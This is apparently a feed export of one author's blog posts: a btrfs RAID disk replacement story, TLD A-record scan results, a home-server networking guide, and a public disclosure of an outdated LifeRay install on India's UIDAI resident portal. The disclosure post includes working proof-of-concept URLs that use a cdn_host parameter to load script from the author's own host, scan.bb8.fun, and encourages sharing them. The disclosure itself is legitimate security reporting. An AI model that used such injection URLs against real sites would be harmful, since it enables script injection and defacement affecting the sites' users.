<p><strong>tl;dr</strong>: Check your disk usage vs. RAID capacity to ensure that you can remove a disk before trying. If you can connect a new disk without removing the old one, run a <code class="language-plaintext highlighter-rouge">btrfs replace</code> - it is much faster.</p>
<hr />
<p>My homeserver has a 4-disk setup:</p>
<ol> <li>128GB Samsung EVO 850 SSD as the primary disk (root volume)</li> <li>A 3 Disk btrfs RAID1 Array that I use for almost everything else.</li> </ol>
<p>The 3 disks were:</p>
<ol> <li>A WD-3.5inch-3TB that I shelled from a WD-MyBook. This was the oldest disk in the array</li> <li>2xSeagate 2.5-inch-3TB external disks that I shelled from Seagate Expansion disks.</li> </ol>
<p>The WD disk had been giving rising errors recently, and I was noticing hangs on the system as well:</p>
<ol> <li>My Steam saves would take time, and hang the game.</li> <li>Kodi would occasionally hang just switching between screens as it would load images from disk.</li> <li>gitea, which writes a lot to disk, would get similar issues.</li> </ol>
<p>I asked a question on <a href="https://www.reddit.com/r/archlinux/comments/asrlam/btrfscleaner_at_100_cpu_usage_on_raid1_setup/egwc047/">r/archlinux</a> and confirmed that it was indeed a dead disk.</p>
<p>Ordered a new Seagate Barracuda 3TB the next day, but my peculiar setup caused me a lot of pain before I could remove the dead disk. The primary issue was with the limited number of SATA connectors I had (just 4).
The original setup had <code class="language-plaintext highlighter-rouge">/dev/sdb,/dev/sdc,/dev/sdd</code> as the three RAID disks with <code class="language-plaintext highlighter-rouge">/dev/sdb</code> being the dying WD.</p>
<p>This is everything I tried:</p>
<ol> <li>Removing <code class="language-plaintext highlighter-rouge">/dev/sdb</code> and adding a new disk to the array (<code class="language-plaintext highlighter-rouge">/dev/sde</code>). Unfortunately, to add a disk to the array, you have to mount it first, and the setup just refused to mount in degraded mode. (It didn’t give a visible error, so I didn’t know why)</li> <li>I tried to keep the old disk attached over USB on a friend’s suggestion, but that didn’t work either. This was likely a cable issue, and I didn’t investigate this further.</li> <li>Booting with the original three disks but replacing the dying disk with the new one post boot. Didn’t work as I kept getting read/write errors to sdb even after it was disconnected.</li> </ol>
<p>In short:</p>
<ul> <li>the system refused to mount the raid array with a missing disk (and I didn’t want to risk a boot with the array unavailable)</li> <li>I couldn’t do a live replace because I had a limited number of SATA connectors.</li> </ul>
<h2 id="what-worked">What worked:</h2>
<p>Running a <code class="language-plaintext highlighter-rouge">btrfs device delete</code> and letting it run overnight.
It gave an error after quite a long time that finally helped me figure out the problem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>btrfs device delete /dev/sdb1 /mnt/xwing
ERROR: error removing device '/dev/sdb1': No space left on device
btrfs fi df /mnt/xwing
Data, RAID1: total=2.98TiB, used=2.98TiB
System, RAID1: total=32.00MiB, used=544.00KiB
Metadata, RAID1: total=5.49GiB, used=4.81GiB
GlobalReserve, single: total=512.00MiB, used=0.00B
</code></pre></div></div>
<p>The RAID array was 2.7TBx3 disks and I was storing roughly <code class="language-plaintext highlighter-rouge">2.98TB</code> of data. To switch to a RAID1 setup with just 2 disks, I needed to delete some data. I ended up clearing out a few steam games (bye bye Witcher 3) and ran another <code class="language-plaintext highlighter-rouge">btrfs device delete</code> to resolve the issue.</p>
<p>If you are faced with a situation where you have to remove a device, but can’t do a live replace, here’s what you need:</p>
<ol> <li>Check that your disk removal does not impact any data storage.
Your n-1 disk array should have enough capacity to store everything.</li> <li>Run a <code class="language-plaintext highlighter-rouge">btrfs device delete</code></li> <li>Reboot</li> <li>Re-attach new disk, and then run a <code class="language-plaintext highlighter-rouge">btrfs device add</code></li> </ol>
<p>As a retro, I posted a summary with the issues I faced on the <a href="https://lore.kernel.org/linux-btrfs/[email protected]/T/#u">btrfs mailing list</a>.</p>
<hr />
<p>If you’re interested in my <a href="/setup/homeserver/">self-hosting setup</a>, I’m using Terraform + Docker, the code is hosted on <a href="https://git.captnemo.in/nemo/nebula/">the same server</a>, and I’ve been writing about my experience and learnings:</p>
<ol> <li><a href="/blog/2017/09/17/home-server-build/">Part 1, Hardware</a></li> <li><a href="/blog/2017/11/09/home-server-update/">Part 2, Terraform/Docker</a></li> <li><a href="/blog/2017/12/18/home-server-learnings/">Part 3, Learnings</a></li> <li><a href="/blog/2017/12/31/migrating-from-google/">Part 4, Migrating from Google (and more)</a></li> <li><a href="/blog/2018/04/22/home-server-networking/">Part 5, Home Server Networking</a></li> <li><a href="/blog/2019/02/24/btrfs-raid-device-replacement-story/">Part 6, btrfs RAID device replacement</a></li> </ol>
<p>If you have any comments, <a href="/contact/">reach out to me</a>.</p>
Aadhaar Vulnerability Public Disclosure 2018-09-15T00:00:00+00:00 https://captnemo.in/blog/2018/09/15/aadhaar-disclosure
<h1 id="the-vulnerability">The Vulnerability</h1>
<p>The UIDAI Resident Portal (with read access to the entire Aadhaar Demographic data) is running a vulnerable version of LifeRay software.
It is running LifeRay 6.1, which was declared End-of-Life in February 2016.</p>
<p>This release includes multiple known vulnerabilities, including:</p>
<ol> <li>An XSS issue, for which a PoC can be found at <a href="https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun">resident.uidai.gov.in</a> (Picture Credits: <a href="https://twitter.com/sanitarypanels">@sanitarypanels</a>)</li> <li>Multiple RCEs: see <a href="https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-62">issue-62</a>, for example.</li> </ol>
<p>In fact the release is so old it does not even appear on the <a href="https://portal.liferay.dev/learn/security/known-vulnerabilities">“Known Vulnerabilities”</a> page on the LifeRay website; you have to go look at their <a href="https://dev.liferay.com/web/community-security-team/known-vulnerabilities/liferay-portal-62">Archived Vulnerabilities</a>.</p>
<h1 id="the-poc">The PoC</h1>
<p>You can find a simple Proof of Concept for the XSS issue at <a href="https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun">resident.uidai.gov.in</a>.</p>
<p>The <code class="language-plaintext highlighter-rouge">cdn_host</code> parameter injects JavaScript from <code class="language-plaintext highlighter-rouge">$CDN_HOST/Resident-theme/js/custom.js</code>, in this case <code class="language-plaintext highlighter-rouge">https://scan.bb8.fun/Resident-theme/js/custom.js</code>, which hosts a small snippet to overwrite the HTML of the page.</p>
<p>It shows up like:</p>
<p><img src="/img/aadhaar1.jpg" alt="" /></p>
<h1 id="fun">Fun</h1>
<p>The current script allows for embedding any tweet using a <code class="language-plaintext highlighter-rouge">tweet</code> parameter. To embed:</p>
<p>Go to any tweet, copy the part after <code class="language-plaintext highlighter-rouge">twitter.com</code> and pass it as the <code class="language-plaintext highlighter-rouge">tweet</code> parameter.
For example, to embed this tweet:</p>
<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">Breaking: Exclusive footage from inside <a href="https://twitter.com/UIDAI?ref_src=twsrc%5Etfw">@UIDAI</a>&#39;s IT department after media reports of Aadhaar data leaks. <a href="https://t.co/W7m9L0HvEX">pic.twitter.com/W7m9L0HvEX</a></p>&mdash; Aadhaar Compound Wall (@13footwall) <a href="https://twitter.com/13footwall/status/979301578686345216?ref_src=twsrc%5Etfw">March 29, 2018</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<ol> <li>Look at the URL: <code class="language-plaintext highlighter-rouge">https://twitter.com/13footwall/status/979301578686345216</code></li> <li>Copy <code class="language-plaintext highlighter-rouge">13footwall/status/979301578686345216</code> and pass it as the <code class="language-plaintext highlighter-rouge">tweet</code> parameter:</li> <li>The URL becomes <code class="language-plaintext highlighter-rouge">https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&amp;tweet=13footwall/status/979301578686345216</code></li> <li><a href="https://resident.uidai.gov.in/?cdn_host=https://scan.bb8.fun&amp;tweet=13footwall/status/979301578686345216"><strong>SHARE IT</strong></a></li> </ol>
<h1 id="the-report">The Report</h1>
<p>I initially reported this to <code class="language-plaintext highlighter-rouge">[email protected]</code> in Jan 2017:</p>
<p><img src="/img/aadhaar-report1.jpg" alt="" /></p>
<p>Forgot all about it till Jan 2018, when someone mentioned I should try my luck with CERT-IN instead:</p>
<p><img src="/img/aadhaar-report2.png" alt="" /></p>
<h1 id="update">Update</h1>
<p>There is <a href="https://twitter.com/kingslyj/status/1040985678408871937">some confusion</a> regarding which version of LifeRay UIDAI is running.
They seem to be running 6.1.1, released on 2013-02-26.</p>
<p>The exact version is not relevant to the fact that UIDAI is:</p>
<ul> <li>running an unsupported release</li> <li>which is 5 years old</li> <li>not updating it despite being notified multiple times</li> </ul>
<p><em>0800 16-Sep</em>: UIDAI seems to have patched the issue by putting a block on the <code class="language-plaintext highlighter-rouge">cdn_host</code> parameter. This still leaves them vulnerable to multiple vulnerabilities until they update to a supported release.</p>
<h1 id="timeline">Timeline</h1>
<p>The vulnerability is still not fixed. Here is a complete timeline:</p>
<table> <thead> <tr> <th>Date</th> <th>What?</th> </tr> </thead> <tbody>
<tr> <td>16 Jan 2017</td> <td>Initially reported to <code class="language-plaintext highlighter-rouge">[email protected]</code>. No response</td> </tr>
<tr> <td>21 Jan 2018</td> <td>Reported to <code class="language-plaintext highlighter-rouge">[email protected]</code> and <code class="language-plaintext highlighter-rouge">[email protected]</code>. No response</td> </tr>
<tr> <td>19 Feb 2018</td> <td>Reminder sent to <code class="language-plaintext highlighter-rouge">[email protected]</code> and <code class="language-plaintext highlighter-rouge">[email protected]</code></td> </tr>
<tr> <td>19 Feb 2018</td> <td>Acknowledgement from CERT</td> </tr>
<tr> <td>15 Mar 2018</td> <td>Reminder sent. No response</td> </tr>
<tr> <td>17 Mar 2018</td> <td>Notified <a href="mailto:[email protected]">NCIIPC</a></td> </tr>
<tr> <td>18 Mar 2018</td> <td>Confirmation from NCIIPC asking for more details.
I replied back with a quote of the previous exchange</td> </tr>
<tr> <td>19 Mar 2018</td> <td>Confirmation from NCIIPC thanking me for the report.</td> </tr>
<tr> <td>19 Apr 2018</td> <td>Reminder sent to UIDAI asking for acknowledgement</td> </tr>
<tr> <td>30 May 2018</td> <td>Reminder sent to NCIIPC and CERT asking for updates</td> </tr>
</tbody> </table>
<p>The only change that I’m aware of since my initial report is that the website stopped declaring the <a href="https://en.wikipedia.org/wiki/Security_through_obscurity">LifeRay version in an HTTP response header</a>.</p>
A records on top level domains 2018-08-18T00:00:00+00:00 https://captnemo.in/blog/2018/08/18/tld-a-records
<p>A few more changes since <a href="/blog/2018/06/02/google-tld-no-more-a-records/">the last time I ran this</a>.</p>
<p><em>Update</em>: An automatically updated version of this is available at https://captnemo.in/tld-a-record/</p>
<table> <thead> <tr> <th>TLD</th> <th>IP</th> <th>Web</th> </tr> </thead> <tbody>
<tr> <td>ai</td> <td>209.59.119.34</td> <td>[<a href="http://ai">http</a>] [<a href="https://ai">https</a>]</td> </tr>
<tr> <td>arab</td> <td>127.0.53.53</td> <td>[<a href="http://arab">http</a>] [<a href="https://arab">https</a>]</td> </tr>
<tr> <td>bh</td> <td>88.201.27.211</td> <td>[<a href="http://bh">http</a>] [<a href="https://bh">https</a>]</td> </tr>
<tr> <td>charity</td> <td>127.0.53.53</td> <td>[<a href="http://charity">http</a>] [<a href="https://charity">https</a>]</td> </tr>
<tr> <td>cm</td> <td>195.24.205.60</td> <td>[<a href="http://cm">http</a>] [<a href="https://cm">https</a>]</td> </tr>
<tr> <td>dk</td> <td>193.163.102.58</td> <td>[<a href="http://dk">http</a>] [<a href="https://dk">https</a>]</td> </tr>
<tr> <td>gg</td> <td>87.117.196.80</td> <td>[<a href="http://gg">http</a>] [<a href="https://gg">https</a>]</td> </tr>
<tr> <td>inc</td> <td>127.0.53.53</td> <td>[<a href="http://inc">http</a>] [<a href="https://inc">https</a>]</td> </tr>
<tr> <td>je</td> <td>87.117.196.80</td>
<td>[<a href="http://je">http</a>] [<a href="https://je">https</a>]</td> </tr> <tr> <td>pa</td> <td>168.77.8.43</td> <td>[<a href="http://pa">http</a>] [<a href="https://pa">https</a>]</td> </tr> <tr> <td>pn</td> <td>80.68.93.100</td> <td>[<a href="http://pn">http</a>] [<a href="https://pn">https</a>]</td> </tr> <tr> <td>politie</td> <td>127.0.53.53</td> <td>[<a href="http://politie">http</a>] [<a href="https://politie">https</a>]</td> </tr> <tr> <td>tk</td> <td>217.119.57.22</td> <td>[<a href="http://tk">http</a>] [<a href="https://tk">https</a>]</td> </tr> <tr> <td>uz</td> <td>91.212.89.8</td> <td>[<a href="http://uz">http</a>] [<a href="https://uz">https</a>]</td> </tr> <tr> <td>ws</td> <td>64.70.19.33</td> <td>[<a href="http://ws">http</a>] [<a href="https://ws">https</a>]</td> </tr> <tr> <td>мон</td> <td>202.170.80.40</td> <td>[<a href="http://мон">http</a>] [<a href="https://мон">https</a>]</td> </tr> <tr> <td>мон</td> <td>218.100.84.27</td> <td>[<a href="http://мон">http</a>] [<a href="https://мон">https</a>]</td> </tr> <tr> <td>мон</td> <td>180.149.98.78</td> <td>[<a href="http://мон">http</a>] [<a href="https://мон">https</a>]</td> </tr> <tr> <td>政府</td> <td>127.0.53.53</td> <td>[<a href="http://政府">http</a>] [<a href="https://政府">https</a>]</td> </tr> <tr> <td>عرب</td> <td>127.0.53.53</td> <td>[<a href="http://عرب">http</a>] [<a href="https://عرب">https</a>]</td> </tr> </tbody> </table> <p>Diff:</p> <div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gi">+bh +charity </span><span class="gd">-etisalat </span><span class="gi">+inc </span><span class="gd">-اتصالات -招聘 </span> 政府 </code></pre></div></div> Google owned TLDs don't have A records any more 2018-06-02T00:00:00+00:00 https://captnemo.in/blog/2018/06/02/google-tld-no-more-a-records <p>A little while ago (Jan 2018), I ran a scan to see which all TLDs have an A record set (on the TLD). 
This is what lets you visit <a href="http://ai/">http://ai/</a> as a valid website on your browser, for example.</p>
<p>I ran the same scan as http://blog.towo.eu/a-records-on-top-level-domains/ (link is down, <a href="https://web.archive.org/web/*/http://blog.towo.eu/a-records-on-top-level-domains/">archived</a>) and the results are at <a href="https://captnemo.in/blog/2018/02/09/tld-a-records/">https://captnemo.in/blog/2018/02/09/tld-a-records/</a>.</p>
<p>Decided to re-run the scan today, and noticed a stark difference: A lot of Google-owned TLDs which were earlier pointing to <code class="language-plaintext highlighter-rouge">127.0.53.53</code> don’t have an A record anymore.</p>
<p>Scan run from <code class="language-plaintext highlighter-rouge">AS45609</code>.</p>
<p>Results:</p>
<table> <thead> <tr> <th>TLD</th> <th>IP</th> <th>Web</th> </tr> </thead> <tbody>
<tr> <td>ai</td> <td>209.59.119.34</td> <td><a href="http://ai">[http]</a>, <a href="https://ai">[https]</a></td> </tr>
<tr> <td>arab</td> <td>127.0.53.53</td> <td>Private IP</td> </tr>
<tr> <td>cm</td> <td>195.24.205.60</td> <td><a href="http://cm">[http]</a>, <a href="https://cm">[https]</a></td> </tr>
<tr> <td>dk</td> <td>193.163.102.58</td> <td><a href="http://dk">[http]</a>, <a href="https://dk">[https]</a></td> </tr>
<tr> <td>etisalat</td> <td>127.0.53.53</td> <td>Private IP</td> </tr>
<tr> <td>gg</td> <td>87.117.196.80</td> <td><a href="http://gg">[http]</a>, <a href="https://gg">[https]</a></td> </tr>
<tr> <td>je</td> <td>87.117.196.80</td> <td><a href="http://je">[http]</a>, <a href="https://je">[https]</a></td> </tr>
<tr> <td>pa</td> <td>168.77.8.43</td> <td><a href="http://pa">[http]</a>, <a href="https://pa">[https]</a></td> </tr>
<tr> <td>pn</td> <td>80.68.93.100</td> <td><a href="http://pn">[http]</a>, <a href="https://pn">[https]</a></td> </tr>
<tr> <td>politie</td> <td>127.0.53.53</td> <td>Private IP</td> </tr>
<tr> <td>tk</td> <td>217.119.57.22</td> <td><a href="http://tk">[http]</a>, <a
href="https://tk">[https]</a></td> </tr> <tr> <td>uz</td> <td>91.212.89.8</td> <td><a href="http://uz">[http]</a>, <a href="https://uz">[https]</a></td> </tr> <tr> <td>ws</td> <td>64.70.19.33</td> <td><a href="http://ws">[http]</a>, <a href="https://ws">[https]</a></td> </tr> <tr> <td>мон</td> <td>218.100.84.27</td> <td><a href="http://мон">[http]</a>, <a href="https://мон">[https]</a></td> </tr> <tr> <td>мон</td> <td>202.170.80.40</td> <td><a href="http://мон">[http]</a>, <a href="https://мон">[https]</a></td> </tr> <tr> <td>мон</td> <td>180.149.98.78</td> <td><a href="http://мон">[http]</a>, <a href="https://мон">[https]</a></td> </tr> <tr> <td>اتصالات</td> <td>127.0.53.53</td> <td>Private IP</td> </tr> <tr> <td>政府</td> <td>127.0.53.53</td> <td>Private IP</td> </tr> <tr> <td>عرب</td> <td>127.0.53.53</td> <td>Private IP</td> </tr> <tr> <td>招聘</td> <td>127.0.53.53</td> <td>Private IP</td> </tr> </tbody> </table> <p>Comparing with the previous scan, these TLDs no longer have an A record with them:</p> <div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gd">-android -cal -chrome -dclk -drive -gle -guge -hangout -nexus -play -sport -谷歌 -グーグル </span></code></pre></div></div> <p>The majority of these are owned by Google. Not claiming it means anything, just a nice observation.</p> <p><em>Update</em>: An automatically updated version of this is available at https://captnemo.in/tld-a-record/</p> Home Server Networking 2018-04-22T00:00:00+00:00 https://captnemo.in/blog/2018/04/22/home-server-networking <p>Next in the Home Server series, this post documents how I got the networking setup to serve content publicly from my under-the-tv server.</p> <p><img src="/img/networking.jpg" alt="Colorful block diagram for the networking setup" /></p> <h2 id="background">Background</h2> <p>My home server runs on a mix of Docker/Traefik orchestrated via Terraform. 
The source code is at <a href="https://git.captnemo.in/nemo/nebula">https://git.captnemo.in/nemo/nebula</a> (self-hosted, dogfooding FTW!) if you wanna take a look.</p>
<p>The ISP is ACT Bangalore<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. They offer decent bandwidth and I’ve been a customer for a long time.</p>
<h2 id="public-static-ip">Public Static IP</h2>
<p>In order to host content, you need a stable public IP. Unfortunately, ACT puts all of its customers in Bangalore behind a NAT <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. As a result, I decided to get a <a href="https://www.digitalocean.com/community/tutorials/how-to-use-floating-ips-on-digitalocean">Floating IP from Digital Ocean</a> <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>
<p>The Static IP is attached to a cheap Digital Ocean Droplet (10$/mo). If you resolve <code class="language-plaintext highlighter-rouge">bb8.fun</code>, this is the IP you will get:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Name:    bb8.fun
Address: 139.59.48.222
</code></pre></div></div>
<p>The droplet has a public static IP of its own as well: <code class="language-plaintext highlighter-rouge">139.59.22.234</code>. The reason I picked a Floating IP is because DO gives them for free, and I can switch between instances later without worrying about it.</p>
<h2 id="floating-ip">Floating IP</h2>
<p>On the Digital Ocean infrastructure side, this IP is not directly attached to an interface on your droplet. Instead, DO uses something called “Anchor IP”:</p>
<blockquote> <p>Network traffic between a Floating IP and a Droplet flows through an anchor IP, which is an IP address aliased to the Droplet’s public network interface (eth0).
You should bind any public services that you want to make highly available through a Floating IP to the anchor IP.</p> </blockquote> <p>So, now my Droplet has 2 different IPs that I can use:</p> <ol> <li>Droplet Public IP (<code class="language-plaintext highlighter-rouge">139.59.22.234</code>), assigned directly to the <code class="language-plaintext highlighter-rouge">eth0</code> interface.</li> <li>Droplet Anchor IP (<code class="language-plaintext highlighter-rouge">10.47.0.5</code>), setup as an alias to the <code class="language-plaintext highlighter-rouge">eth0</code> interface.</li> </ol> <p>This doubles the number of services I can listen to. I could have (for eg) - 2 different webservers on both of these IPs.</p> <h2 id="openvpn">OpenVPN</h2> <p>In order to establish NAT-punching connectivity between the Droplet and the Home Server, I run OpenVPN server on the Droplet and <code class="language-plaintext highlighter-rouge">openvpn-client</code> on the homeserver.<sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup></p> <p>The <a href="https://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-16-04" title="by Justin Ellingwood">Digital Ocean Guide</a> is a great resource if you ever have to do this. 
2 specific IPs on the OpenVPN network are marked as static:</p>
<ol> <li>Droplet: <code class="language-plaintext highlighter-rouge">10.8.0.1</code></li> <li>Home Server: <code class="language-plaintext highlighter-rouge">10.8.0.14</code></li> </ol>
<h2 id="home-server---networking">Home Server - Networking</h2>
<ul> <li>The server has a private static IP assigned to its <code class="language-plaintext highlighter-rouge">eth0</code> interface</li> <li>It also has a private static IP assigned to its <code class="language-plaintext highlighter-rouge">tun0</code> interface</li> </ul>
<p>There are primarily 3 kinds of services that I like to run:</p>
<ol> <li>Accessible only from within the home network (Timemachine backups, for example) (Internal). This I publish on the <code class="language-plaintext highlighter-rouge">eth0</code> interface.</li> <li>Accessible only from the public internet (Wiki) (Strictly Public). These I publish on the <code class="language-plaintext highlighter-rouge">tun0</code> interface and proxy via the droplet.</li> <li>Accessible from both places (Emby, AirSonic) (Public).
These I publish on both <code class="language-plaintext highlighter-rouge">tun0</code> and the <code class="language-plaintext highlighter-rouge">eth0</code> interface on the homeserver.</li> </ol>
<h2 id="docker-networking-basics">Docker Networking Basics</h2>
<p>Docker runs its own internal network for services, and lets you “publish” these services by forwarding traffic from a given interface to them.</p>
<p>In plain docker-cli, this would be:</p>
<p><code class="language-plaintext highlighter-rouge">docker run --publish 443:443 --publish 80:80 nginx</code> (forward traffic on ports 443 and 80 on all interfaces to the container)</p>
<p>Since I use Terraform, it looks <a href="https://git.captnemo.in/nemo/nebula/src/branch/master/docker/traefik.tf">like the following for Traefik</a>:</p>
<div class="language-perl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Admin Backend</span>
<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">1111</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">1111</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">eth0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>

<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">1111</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">1111</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">tun0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>

<span class="c1"># Local Web Server</span>
<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">80</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">80</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">eth0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>

<span class="c1"># Local Web Server (HTTPS)</span>
<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">443</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">443</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">eth0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>

<span class="c1"># Proxied via sydney.captnemo.in</span>
<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">443</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">443</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">tun0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>

<span class="nv">ports</span> <span class="p">{</span>
  <span class="nv">internal</span> <span class="o">=</span> <span class="mi">80</span>
  <span class="nv">external</span> <span class="o">=</span> <span class="mi">80</span>
  <span class="nv">ip</span> <span class="o">=</span> <span class="p">"</span><span class="si">${var</span><span class="err">.</span><span class="si">ips</span><span class="err">["</span><span class="si">tun0</span><span class="err">"]</span><span class="si">}</span><span class="p">"</span>
<span class="p">}</span>
</code></pre></div></div>
<p>There are 3 “services” exposed by Traefik on 3 ports:</p>
<dl> <dt>Traefik Admin Interface</dt> <dd>Useful for debugging. I leave this in Read-Only mode with no authentication. This is an <em>Internal</em> service</dd> <dt>HTTP, Port 80</dt> <dd>This redirects users to the next entrypoint (HTTPS). This is a <em>Public</em> service.</dd> <dt>HTTPS, Port 443</dt> <dd>This is where most of the traffic flows. This is a <em>Public</em> service.</dd> </dl>
<p>For all 3 of the above, Docker forwards traffic from both OpenVPN and the home network. OpenVPN lets me access this from my laptop when I’m not at home, which is helpful for debugging issues. However, to keep the Admin Interface internal, it is not published to the internet.</p>
<h1 id="internet-access">Internet Access</h1>
<p>The “bridge” between the Floating IP and the OpenVPN IP (both on the Digital Ocean droplet) is <code class="language-plaintext highlighter-rouge">simpleproxy</code>. It is a <a href="https://github.com/vzaliva/simpleproxy">barely-maintained 200 line TCP-proxy</a>. I picked it up because of its ease of use as a TCP Proxy.
I specifically looked for a TCP Proxy because:</p> <ol> <li>I did not want to terminate SSL on Digital Ocean, since Traefik was already doing LetsEncrypt cert management for me</li> <li>I also wanted to proxy non-web services (more below).</li> </ol> <p>The simpleproxy configuration consists of a few systemd units:</p> <div class="language-ini highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">[Service]</span> <span class="py">Type</span><span class="p">=</span><span class="s">simple</span> <span class="py">WorkingDirectory</span><span class="p">=</span><span class="s">/tmp</span> <span class="c"># Forward Anchor IP 80 -&gt; Home Server VPN 80 </span><span class="py">ExecStart</span><span class="p">=</span><span class="s">/usr/bin/simpleproxy -L 10.47.0.5:80 -R 10.8.0.14:80</span> <span class="py">Restart</span><span class="p">=</span><span class="s">on-abort</span> <span class="nn">[Install]</span> <span class="py">WantedBy</span><span class="p">=</span><span class="s">multi-user.target</span> <span class="nn">[Unit]</span> <span class="py">Description</span><span class="p">=</span><span class="s">Simple Proxy</span> <span class="py">After</span><span class="p">=</span><span class="s">network.target</span> </code></pre></div></div> <p>I run 3 of these: 2 for HTTP/HTTPS, and another one for SSH.</p> <p>While I use simpleproxy for its stability and simplicity, you could also use iptables to achieve the same result.</p> <h1 id="ssh-tunelling">SSH Tunnelling</h1> <p>When I’m on the go, there are 3 different SSH services I might need:</p> <ol> <li>Digital Ocean Droplet</li> <li>Home Server</li> <li>Git (<code class="language-plaintext highlighter-rouge">gitea</code> runs its own internal git server)</li> </ol> <p>My initial plan was:</p> <ol> <li>Forward Port 22 Floating IP Traffic to Gitea.</li> <li>Use the <code class="language-plaintext highlighter-rouge">eth0</code> interface on the droplet to run the droplet <code 
class="language-plaintext highlighter-rouge">sshd</code> service.</li> <li>Keep the Home Server SSH forwarded to OpenVPN, so I can access it over the VPN network.</li> </ol> <p>Unfortunately, that didn’t work out well, because <code class="language-plaintext highlighter-rouge">sshd</code> <a href="https://serverfault.com/questions/605446/make-sshd-listen-to-a-specific-interface">doesn’t support listening on an Interface</a>. I could have used the Public Droplet IP, but I didn’t like the idea.</p> <p>The current setup instead involves:</p> <ol> <li>Running the droplet <code class="language-plaintext highlighter-rouge">sshd</code> on a separate port entirely (2222).</li> <li>The <code class="language-plaintext highlighter-rouge">simpleproxy</code> service forwarding port 22 traffic to 2222 on the OpenVPN IP, which is then published by Docker to the <code class="language-plaintext highlighter-rouge">gitea</code> container’s port 22.</li> </ol> <p><a href="https://git.captnemo.in/nemo/nebula/src/branch/master/docker/conf/traefik.toml">The complete traefik configuration</a> is also available if you wanna look at the entrypoints in detail.</p> <h1 id="caveats">Caveats</h1> <h2 id="traefik-public-access">Traefik Public Access</h2> <p>You might have noticed that because <code class="language-plaintext highlighter-rouge">traefik</code> is listening on both <code class="language-plaintext highlighter-rouge">eth0</code> and <code class="language-plaintext highlighter-rouge">tun0</code>, there is no guarantee of a “strictly internal” service via Traefik. Traefik just uses the Host headers in the request (or SNI) to determine the container to which it needs to forward the request. I use <code class="language-plaintext highlighter-rouge">*.in.bb8.fun</code> for internally accessible services, and <code class="language-plaintext highlighter-rouge">*.bb8.fun</code> for public. 
But if someone decides to spoof the headers, they can access the Internal service.</p> <p>Since I’m aware of the risk, I do not publish anything via traefik that I’m not comfortable putting on the internet. Only a couple of services are marked as “internal-also”, and are published on both. Services like Prometheus are not published via Traefik.</p> <h2 id="2-servers">2 Servers</h2> <p>Running and managing 2 servers takes a bit more effort, and has more moving parts. But I use the droplet for other tasks as well (running my <a href="https://captnemo.in/dnscrypt/">DNSCrypt Server</a>, for eg).</p> <h2 id="original-ip-address">Original IP Address</h2> <p>Since SimpleProxy does not support the <a href="https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt">Proxy Protocol</a>, both Traefik and Gitea/SSH servers don’t get informed about the original IP Address. I plan to fix that by switching to HAProxy TCP-mode.</p> <hr /> <p>If you’re interested in my <a href="/setup/homeserver/">self-hosting setup</a>, I’m using Terraform + Docker, the code is hosted on <a href="https://git.captnemo.in/nemo/nebula/">the same server</a>, and I’ve been writing about my experience and learnings:</p> <ol> <li><a href="/blog/2017/09/17/home-server-build/">Part 1, Hardware</a></li> <li><a href="/blog/2017/11/09/home-server-update/">Part 2, Terraform/Docker</a></li> <li><a href="/blog/2017/12/18/home-server-learnings/">Part 3, Learnings</a></li> <li><a href="/blog/2017/12/31/migrating-from-google/">Part 4, Migrating from Google (and more)</a></li> <li><a href="/blog/2018/04/22/home-server-networking/">Part 5, Home Server Networking</a></li> <li><a 